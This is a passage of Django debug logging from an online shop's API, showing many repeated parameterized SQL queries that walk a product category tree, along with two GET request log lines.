"shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-13 14:31:11,871 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-13 14:31:11,873 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-13 14:31:11,876 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 14:31:11,879 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-13 14:31:11,881 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-13 14:31:11,884 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-13 14:31:11,886 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-13 14:31:11,889 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 14:31:11,892 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-13 14:31:11,894 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-13 14:31:11,897 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-13 14:31:11,899 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-13 14:31:11,901 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 14:31:11,905 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-13 14:31:11,907 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-13 14:31:11,910 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-13 14:31:11,912 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-13 14:31:11,915 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-13 14:31:11,917 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 14:31:11,921 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-13 14:31:11,923 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-13 14:31:11,926 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-13 14:31:11,929 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-13 14:31:11,932 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 14:31:11,936 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-13 14:31:11,938 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-13 14:31:11,941 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-13 14:31:11,946 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-13 14:31:11,949 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 14:31:11,953 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-13 14:31:11,956 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-13 14:31:11,958 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-13 14:31:11,961 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-13 14:31:11,963 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-13 14:31:11,965 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 14:31:11,968 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-13 14:31:11,971 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-13 14:31:11,973 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-13 14:31:11,976 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-13 14:31:11,978 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [13/Dec/2019 14:31:11] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-13 14:31:25,696 utils 20136 140506422044416 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 4; args=(4,) DEBUG 2019-12-13 14:31:25,708 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) [13/Dec/2019 14:31:25] "GET /api/v1/categories/4 HTTP/1.0" 200 952 DEBUG 2019-12-13 14:31:25,735 utils 20136 140506667599616 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 14:31:25,745 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 14:31:25,750 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-13 14:31:25,753 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 14:31:25,756 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-13 14:31:25,758 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-13 14:31:25,760 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-13 14:31:25,762 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-13 14:31:25,765 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 14:31:25,769 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-13 14:31:25,771 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-13 14:31:25,774 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-13 14:31:25,776 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-13 14:31:25,779 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 14:31:25,782 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-13 14:31:25,784 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-13 14:31:25,787 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-13 14:31:25,789 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-13 14:31:25,791 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 14:31:25,795 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-13 14:31:25,797 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-13 14:31:25,800 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-13 14:31:25,802 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-13 14:31:25,804 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-13 14:31:25,807 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" 